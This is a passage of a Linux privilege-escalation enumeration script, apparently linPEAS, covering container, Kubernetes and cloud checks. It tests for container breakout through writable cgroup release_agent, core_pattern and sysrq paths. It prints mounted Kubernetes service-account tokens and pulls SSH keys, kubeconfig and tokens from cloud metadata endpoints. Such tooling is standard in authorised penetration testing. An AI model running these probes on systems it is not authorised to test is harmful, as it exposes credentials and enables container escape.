"$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) echo
$sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v
"$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' if [ "$sockInfoResponse" ]; then
docker_enumerated="1"; fi fi if [ "$(command -v docker)" ] && ! [
"$docker_enumerated" ]; then sockInfoResponse="$(docker info)"
dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' |
cut -d' ' -f 4) printf "$sockInfoResponse" | tr ',' '\n' | grep -E
"$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
fi else echo "You have write permissions over interesting socket $int_sock" |
sed -${E} "s,$int_sock,${SED_RED},g" fi else echo "You don't have write
permissions over interesting socket $int_sock" | sed -${E}
"s,$int_sock,${SED_GREEN},g" fi done fi } checkDockerVersionExploits() { if echo
"$dockerVersion" | grep -iq "not found"; then
VULN_CVE_2019_13139="$(echo_not_found)" VULN_CVE_2019_5736="$(echo_not_found)"
return fi VULN_CVE_2019_13139="$(echo_no)" if [ "$(echo $dockerVersion | sed
's,\.,,g')" -lt "1895" ]; then VULN_CVE_2019_13139="Yes" fi
VULN_CVE_2019_5736="$(echo_no)" if [ "$(echo $dockerVersion | sed 's,\.,,g')"
-lt "1893" ]; then VULN_CVE_2019_5736="Yes" fi } checkContainerExploits() {
VULN_CVE_2019_5021="$(echo_no)" if [ -f "/etc/alpine-release" ]; then
alpineVersion=$(cat /etc/alpine-release) if [ "$(echo $alpineVersion | sed
's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360"
]; then VULN_CVE_2019_5021="Yes" fi fi } checkCreateReleaseAgent(){ cat
/proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' |
while read -r subsys do if unshare -UrmC --propagation=unchanged bash -c "mount
-t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w
/tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then
release_agent_breakout2="Yes (unshare with $subsys)"; rm -rf /tmp/cgroup_3628d4
break fi done } checkProcSysBreakouts(){ dev_mounted="No" if [ $(ls -l /dev |
grep -E "^c" | wc -l) -gt 50 ]; then dev_mounted="Yes"; fi proc_mounted="No" if
[ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then proc_mounted="Yes"; fi
run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null) if ! [
"$run_unshare" = "Yes" ]; then run_unshare="No" fi if [ "$(ls -l
/sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then
release_agent_breakout1="Yes" else release_agent_breakout1="No" fi
release_agent_breakout2="No" mkdir /tmp/cgroup_3628d4 mount -t cgroup -o memory
cgroup /tmp/cgroup_3628d4 2>/dev/null if [ $? -eq 0 ]; then
release_agent_breakout2="Yes"; rm -rf /tmp/cgroup_3628d4 else mount -t cgroup -o
rdma cgroup /tmp/cgroup_3628d4 2>/dev/null if [ $? -eq 0 ]; then
release_agent_breakout2="Yes"; rm -rf /tmp/cgroup_3628d4 else
checkCreateReleaseAgent fi fi rm -rf /tmp/cgroup_3628d4 2>/dev/null
core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo
Yes) 2>/dev/null || echo No)" modprobe_present="$(ls -l `cat
/proc/sys/kernel/modprobe` 2>/dev/null || echo No)" panic_on_oom_dos="$( (echo
-n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)"
panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes)
2>/dev/null || echo No)" binfmt_misc_breakout="$( (echo -n '' >
/proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)"
proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes ||
echo No)" sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes)
2>/dev/null || echo No)" kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes)
2>/dev/null || echo No)" # Kernel Exploit Dev kallsyms_readable="$( (head -n 1
/proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel
Exploit Dev mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes)
2>/dev/null || echo No)" if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then
kcore_readable="Yes"; else kcore_readable="No"; fi kmem_readable="$( (head -n 1
/proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" kmem_writable="$(
(echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)"
mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null ||
echo No)" mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes)
2>/dev/null || echo No)" sched_debug_readable="$( (head -n 1 /proc/sched_debug >
/dev/null && echo Yes) 2>/dev/null || echo No)" mountinfo_readable="$( (head -n
1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes)
2>/dev/null || echo No)" vmcoreinfo_readable="$( (head -n 1
/sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)"
security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes)
2>/dev/null || echo No)" security_writable="$( (echo -n '' >
/sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)"
efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes)
2>/dev/null || echo No)" efi_efivars_writable="$( (echo -n '' >
/sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)" }
############################################## #---------------) Containers
(---------------# ############################################## containerCheck
print_2title "Container related tools present (if any):" command -v docker
command -v lxc command -v rkt command -v kubectl command -v podman command -v
runc if [ "$$FAT_LINPEAS_AMICONTAINED" ]; then print_2title "Am I Containered?"
execBin "AmIContainered" "https://github.com/genuinetools/amicontained"
"$FAT_LINPEAS_AMICONTAINED" fi print_2title "Container details" print_list "Is
this a container? ...........$NC $containerType" print_list "Any running
containers? ........ "$NC # Get counts of running containers for each platform
dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l)
podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l)
lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l)
rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) if [
"$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [
"$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then echo_no else
containerCounts="" if [ "$dockercontainers" -ne "0" ]; then
containerCounts="${containerCounts}docker($dockercontainers) "; fi if [
"$podmancontainers" -ne "0" ]; then
containerCounts="${containerCounts}podman($podmancontainers) "; fi if [
"$lxccontainers" -ne "0" ]; then
containerCounts="${containerCounts}lxc($lxccontainers) "; fi if [
"$rktcontainers" -ne "0" ]; then
containerCounts="${containerCounts}rkt($rktcontainers) "; fi echo "Yes
$containerCounts" | sed -${E} "s,.*,${SED_RED}," # List any running containers
if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed
-${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi if [
"$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E}
"s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi if [
"$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E}
"s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi if [ "$rktcontainers" -ne
"0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt
list 2>/dev/null; echo ""; fi fi # If docker if echo "$containerType" | grep -qi
"docker"; then print_2title "Docker Container details" inDockerGroup print_list
"Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E}
"s,Yes,${SED_RED_YELLOW}," print_list "Looking and enumerating Docker Sockets
(if any):\n"$NC enumerateDockerSockets print_list "Docker version
.................$NC$dockerVersion" checkDockerVersionExploits print_list
"Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E}
"s,Yes,${SED_RED_YELLOW}," print_list "Vulnerable to CVE-2019-13139
...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," if [
"$inContainer" ]; then checkDockerRootless print_list "Rootless Docker?
............... $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed
-${E} "s,Yes,${SED_GREEN}," echo "" fi if df -h | grep docker; then print_2title
"Docker Overlays" df -h | grep docker fi fi # If token secrets mounted if [
"$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type
tmpfs.*$/\1\/namespace/p')" ]; then print_2title "Listing mounted tokens"
print_info
"https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod"
ALREADY="IinItialVaaluE" for i in $(mount | sed -n '/secret/ s/^tmpfs on
\(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do TOKEN=$(cat $(echo $i | sed
's/.namespace$/\/token/')) if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
ALREADY="$ALREADY|$TOKEN" echo "Directory: $i" echo "Namespace: $(cat $i)" echo
"" echo $TOKEN echo
"================================================================================"
echo "" fi done fi if [ "$inContainer" ]; then echo "" print_2title "Container &
breakout enumeration" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout"
print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n
'\n')" if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker";
then print_list "Container Full ID ..............$NC $(basename $(cat
/proc/1/cpuset))\n" fi print_list "Seccomp enabled? ............... "$NC ([
"$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo
"disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
print_list "AppArmor profile? .............. "$NC (cat /proc/self/attr/current
2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed
"s,kernel,${SED_GREEN}," print_list "User proc namespace? ........... "$NC if [
"$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat
/proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed
"s,disabled,${SED_RED},"; fi checkContainerExploits print_list "Vulnerable to
CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E}
"s,Yes,${SED_RED_YELLOW}," print_3title "Breakout via mounts" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts"
checkProcSysBreakouts print_list "/proc mounted? .................
$proc_mounted\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "/dev
mounted? .................. $dev_mounted\n" | sed -${E}
"s,Yes,${SED_RED_YELLOW}," print_list "Run ushare .....................
$run_unshare\n" | sed -${E} "s,Yes,${SED_RED}," print_list "release_agent
breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed
-${E} "s,Yes,${SED_RED_YELLOW}," print_list "core_pattern breakout ..........
$core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list
"binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E}
"s,Yes,${SED_RED_YELLOW}," print_list "uevent_helper breakout .........
$uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "is
modprobe present ............ $modprobe_present\n" | sed -${E}
"s,/.*,${SED_RED}," print_list "DoS via panic_on_oom ...........
$panic_on_oom_dos\n" | sed -${E} "s,Yes,${SED_RED}," print_list "DoS via
panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/proc/config.gz readable .......
$proc_configgz_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list
"/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/proc/*/mountinfo readable .....
$mountinfo_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list
"/sys/kernel/security present ... $security_present\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/sys/kernel/security writable ..
$security_writable\n" | sed -${E} "s,Yes,${SED_RED}," if [ "$EXTRA_CHECKS" ];
then print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/proc/kallsyms readable ........
$kallsyms_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/self/mem
readable ........ $sched_debug_readable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/proc/kmem readable ............
$kmem_readable\n" | sed -${E} "s,Yes,${SED_RED}," print_list "/proc/kmem
writable ............ $kmem_writable\n" | sed -${E} "s,Yes,${SED_RED},"
print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/proc/mem writable .............
$mem_writable\n" | sed -${E} "s,Yes,${SED_RED}," print_list
"/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E}
"s,Yes,${SED_RED}," print_list "/sys/firmware/efi/vars writable
$efi_vars_writable\n" | sed -${E} "s,Yes,${SED_RED}," print_list
"/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E}
"s,Yes,${SED_RED}," fi echo "" print_3title "Namespaces" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces"
ls -l /proc/self/ns/ if echo "$containerType" | grep -qi "kubernetes"; then
print_list "Kubernetes namespace ...........$NC $(cat
/run/secrets/kubernetes.io/serviceaccount/namespace
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" print_list
"Kubernetes token ...............$NC $(cat
/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/token
/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" echo "" print_2title
"Kubernetes Information" print_info
"https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod"
print_3title "Kubernetes service account folder" ls -lR
/run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/
/secrets/kubernetes.io/ 2>/dev/null echo "" print_3title "Kubernetes env vars"
(env | set) | grep -Ei "kubernetes|kube" | grep -Ev
"^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
echo "" print_3title "Current sa user k8s permissions" print_info
"https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes"
kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo
\"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64
-d)" \
"https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
\ -X 'POST' -H 'Content-Type: application/json' \ --header "Authorization:
Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed
"s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED}," fi echo ""
print_2title "Container Capabilities" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
if [ "$(command -v capsh)" ]; then capsh --print 2>/dev/null | sed -${E}
"s,$containercapsB,${SED_RED},g" else
defautl_docker_caps="00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap"
cat /proc/self/status | tr '\t' ' ' | grep Cap | sed -${E} "s, .*,${SED_RED},g"
| sed -${E} "s/00000000a80425fb/$defautl_docker_caps/g" | sed -${E}
"s,0000000000000000|00000000a80425fb,${SED_GREEN},g" echo $ITALIC"Run capsh
--decode=<hex> to decode the capabilities"$NC fi echo "" print_2title "Privilege
Mode" if [ -x "$(command -v fdisk)" ]; then if [ "$(fdisk -l 2>/dev/null | wc
-l)" -gt 0 ]; then echo "Privilege Mode is enabled"| sed -${E}
"s,enabled,${SED_RED_YELLOW}," else echo "Privilege Mode is disabled"| sed -${E}
"s,disabled,${SED_GREEN}," fi else echo_not_found fi echo "" print_2title
"Interesting Files Mounted" (mount -l || cat /proc/self/mountinfo || cat
/proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat
/proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E}
"s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E}
"s,/dev/,${SED_RED},g" echo "" print_2title "Possible Entrypoints" ls -lah /*.sh
/*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq echo
"" fi fi echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue";
read "asd"; fi if echo $CHECKS | grep -q cloud; then print_title "Cloud"
########################################### #-----------) Cloud functions
(-----------# ###########################################
GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
GCP_BAD_SCOPES="/cloud-platform|/compute" exec_with_jq(){ if [ "$(command -v
jq)" ]; then $@ | jq 2>/dev/null; if ! [ $? -eq 0 ]; then $@; fi else $@; fi }
check_gcp(){ is_gcp="No" if grep -q metadata.google.internal /etc/hosts
2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null
2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1
metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then is_gcp="Yes"
fi } check_do(){ is_do="No" if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg"
]; then is_do="Yes" fi } check_ibm_vm(){ is_ibm_vm="No" if grep -q "nameserver
161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11"
"/etc/resolv.conf"; then curl --connect-timeout 2 "http://169.254.169.254" >
/dev/null 2>&1 || wget --timeout 2 --tries 1 "http://169.254.169.254" >
/dev/null 2>&1 if [ "$?" -eq 0 ]; then IBM_TOKEN=$( ( curl -s -X PUT
"http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H
"Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"'
-f4 ) || ( wget --tries 1 -O - --method PUT
"http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header
"Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d
'"' -f4 ) ) is_ibm_vm="Yes" fi fi } check_aws_ecs(){ is_aws_ecs="No" if (env |
grep -q ECS_CONTAINER_METADATA_URI_v4); then is_aws_ecs="Yes";
aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
elif (env | grep -q ECS_CONTAINER_METADATA_URI); then is_aws_ecs="Yes";
aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
is_aws_ecs="Yes"; fi if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
fi } check_aws_ec2(){ is_aws_ec2="No" is_aws_ec2_beanstalk="No" if [ -d
"/var/log/amazon/" ]; then is_aws_ec2="Yes" EC2_TOKEN=$(curl --connect-timeout 2
-X PUT "http://169.254.169.254/latest/api/token" -H
"X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2
--tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token"
--header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) else
EC2_TOKEN=$(curl --connect-timeout 2 -X PUT
"http://169.254.169.254/latest/api/token" -H
"X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2
--tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token"
--header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) if [ "$(echo
$EC2_TOKEN | cut -c1-2)" = "AQ" ]; then is_aws_ec2="Yes" fi fi if [
"$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then
is_aws_ec2_beanstalk="Yes" fi } check_aws_lambda(){ is_aws_lambda="No" if (env |
grep -q AWS_LAMBDA_); then is_aws_lambda="Yes" fi } check_aws_codebuild(){
is_aws_codebuild="No" if [ -f "/codebuild/output/tmp/env.sh" ] && grep -q
"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" "/codebuild/output/tmp/env.sh" ; then
is_aws_codebuild="Yes" fi } check_az_vm(){ is_az_vm="No" if [ -d
"/var/log/azure/" ]; then is_az_vm="Yes" elif cat /etc/resolv.conf 2>/dev/null |
grep -q "search reddog.microsoft.com"; then is_az_vm="Yes" fi } check_az_app(){
is_az_app="No" if [ -d "/opt/microsoft" ] && env | grep -q "IDENTITY_ENDPOINT";
then is_az_app="Yes" fi } check_gcp print_list "Google Cloud Platform?
............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed
"s,No,${SED_GREEN}," check_aws_ecs print_list "AWS ECS?
............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed
"s,No,${SED_GREEN}," check_aws_ec2 print_list "AWS EC2?
............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed
"s,No,${SED_GREEN}," print_list "AWS EC2 Beanstalk? ...................
$is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_lambda print_list "AWS Lambda? ..........................
$is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_aws_codebuild print_list "AWS Codebuild? .......................
$is_aws_codebuild\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
check_do print_list "DO Droplet? .......................... $is_do\n"$NC | sed
"s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_ibm_vm print_list "IBM
Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," |
sed "s,No,${SED_GREEN}," check_az_vm print_list "Azure VM?
............................ $is_az_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed
"s,No,${SED_GREEN}," check_az_app print_list "Azure APP?
........................... $is_az_app\n"$NC | sed "s,Yes,${SED_RED}," | sed
"s,No,${SED_GREEN}," echo "" if [ "$is_gcp" = "Yes" ]; then gcp_req="" if [
"$(command -v curl)" ]; then gcp_req='curl -s -f -H "X-Google-Metadata-Request:
True"' elif [ "$(command -v wget)" ]; then gcp_req='wget -q -O - --header
"X-Google-Metadata-Request: True"' else echo "Neither curl nor wget were found,
I can't enumerate the metadata service :(" fi # GCP Enumeration if [ "$gcp_req"
]; then print_2title "Google Cloud Platform Enumeration" print_info
"https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security" ## GC Project Info
p_id=$(eval $gcp_req
'http://metadata.google.internal/computeMetadata/v1/project/project-id') [
"$p_id" ] && echo "Project-ID: $p_id" p_num=$(eval $gcp_req
'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
[ "$p_num" ] && echo "Project Number: $p_num" pssh_k=$(eval $gcp_req
'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
[ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k" p_attrs=$(eval $gcp_req
'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
[ "$p_attrs" ] && echo "All Project Attributes: $p_attrs" # OSLogin Info
osl_u=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/oslogin/users) [ "$osl_u" ]
&& echo "OSLogin users: $osl_u" osl_g=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/oslogin/groups) [ "$osl_g" ]
&& echo "OSLogin Groups: $osl_g" osl_sk=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys) [
"$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk" osl_au=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/oslogin/authorize) [
"$osl_au" ] && echo "OSLogin Authorize: $osl_au" # Instance Info inst_d=$(eval
$gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/description) [
"$inst_d" ] && echo "Instance Description: " inst_hostn=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/hostname) [
"$inst_hostn" ] && echo "Hostname: $inst_hostn" inst_id=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/id) [ "$inst_id" ]
&& echo "Instance ID: $inst_id" inst_img=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/image) [ "$inst_img"
] && echo "Instance Image: $inst_img" inst_mt=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/machine-type) [
"$inst_mt" ] && echo "Machine Type: $inst_mt" inst_n=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/name) [ "$inst_n" ]
&& echo "Instance Name: $inst_n" inst_tag=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags) [
"$inst_tag" ] && echo "Instance tags: $inst_tag" inst_zone=$(eval $gcp_req
http://metadata.google.internal/computeMetadata/v1/instance/zone) [ "$inst_zone"
] && echo "Zone: $inst_zone" inst_k8s_loc=$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
[ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
inst_k8s_name=$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
[ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
inst_k8s_osl_e=$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
[ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
inst_k8s_klab=$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
[ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
inst_k8s_kubec=$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
[ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
inst_k8s_kubenv=$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
[ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv" echo ""
print_3title "Interfaces" for iface in $(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/");
do echo " IP: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
echo " ============== " done echo "" print_3title "User Data" echo $(eval
$gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
echo "" echo "" print_3title "Service Accounts" for sa in $(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/");
do echo " Name: $sa" echo " Email: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
echo " Aliases: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
echo " Identity: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
echo " Scopes: "$(eval $gcp_req
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes")
| sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E}
